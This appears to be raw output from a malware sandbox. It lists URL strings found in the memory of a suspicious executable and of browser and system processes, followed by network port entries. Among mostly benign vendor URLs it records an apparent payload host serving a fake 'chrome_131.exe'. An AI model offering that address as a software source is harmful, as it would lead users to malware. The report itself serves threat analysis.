                    Source: WGo3ga1AL9.exe, WGo3ga1AL9.exe, 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332846243.000000006D011000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                    Source: chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                    Source: chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1747021034.000001B307F22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1747021034.000001B307F67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1747021034.000001B307F48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1747021034.000001B307F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                    Source: chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj
                    Source: chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                    Source: chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                    Source: chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                    Source: chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                    Source: chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                    Source: chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                    Source: chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                    Source: chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                    Source: chrome.exe, 00000001.00000003.1785401115.00002A100360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784493645.00002A10034CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                    Source: chrome.exe, 00000001.00000003.1767281036.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1768150932.00002A100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                    Source: chrome.exe, 00000001.00000003.1767281036.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1768150932.00002A100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                    Source: chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                    Source: chrome.exe, 00000001.00000003.1742192459.00002FFC006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                    Source: chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                    Source: chrome.exe, 00000001.00000003.1785627174.00002A1002DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
                    Source: chrome.exe, 00000001.00000003.1785401115.00002A100360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784493645.00002A10034CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                    Source: chrome.exe, 00000001.00000003.1785697965.00002A1002494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                    Source: svchost.exe, 00000002.00000003.1747021034.000001B307ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1761137758.00002A1002C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1761137758.00002A1002C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1761137758.00002A1002C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1761137758.00002A1002C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                    Source: chrome.exe, 00000001.00000003.1801601349.00002A1004970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1761137758.00002A1002C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2328679581.0000000021031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osteo9.esalnuvol.com/
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osteo9.esalnuvol.com/adjunts/chrome_131.exe
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osteo9.esalnuvol.com/adjunts/chrome_131.exe/
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osteo9.esalnuvol.com/adjunts/chrome_131.exeX
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osteo9.esalnuvol.com/adjunts/chrome_131.exeo
                    Source: chrome.exe, 00000001.00000003.1767281036.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1768150932.00002A100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                    Source: chrome.exe, 00000001.00000003.1785401115.00002A100360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784493645.00002A10034CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1843746210.0000000020EF3000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201645.47
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1843746210.0000000020EF3000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17crosoft
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: chrome.exe, 00000001.00000003.1775578166.00002A1002E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chrome.exe, 00000001.00000003.1785401115.00002A100360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784493645.00002A10034CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                    Source: chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                    Source: chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
                    Source: chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 00000001.00000003.1785138110.00002A100320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785401115.00002A100360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785272411.00002A1003650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.mTUNAFoITms.2019.O/rt=j/m=q_d
                    Source: chrome.exe, 00000001.00000003.1785453667.00002A1003628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784401800.00002A10036AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784471915.00002A10036BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1785503482.00002A10034E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1784445251.00002A10036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usGF8aHBnbGZoZ2ZuaGJncGpk
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usWFwa21ibGlvYnwxfDB8MHxM
                    Source: WGo3ga1AL9.exe, 00000000.00000003.1944501248.00000000212D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
